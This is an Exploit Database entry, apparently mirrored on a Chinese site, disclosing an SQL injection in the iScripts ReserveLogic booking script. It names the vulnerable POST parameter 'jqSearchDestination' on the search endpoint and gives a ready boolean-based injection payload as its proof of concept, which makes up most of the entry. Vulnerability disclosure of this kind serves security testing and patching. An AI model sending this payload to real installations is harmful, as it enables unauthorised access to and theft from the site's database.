iScripts ReserveLogic – SQL Injection

• Exploit Database
• 54 阅读

• 作者： Ahmet Ümit BAYRAM
  日期： 2019-04-03
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/46640/

• # Exploit Title: iScripts ReserveLogic - SQL Injection
  # Date: 29.03.2019
  # Exploit Author: Ahmet Ümit BAYRAM
  # Vendor Homepage: https://www.iscripts.com/reservelogic/
  # Demo Site: https://www.demo.iscripts.com/reservelogic/demo/
  # Version: Lastest
  # Tested on: Kali Linux
  # CVE: N/A
  
  ----- PoC: SQLi -----
  
  Request: http://localhost/[PATH]/search
  Vulnerable Parameter: jqSearchDestination (POST)
  Payload: jqSearchDestination=(SELECT (CASE WHEN (8124=8124) THEN 12345 ELSE
  (SELECT 3029 UNION SELECT 1241) END))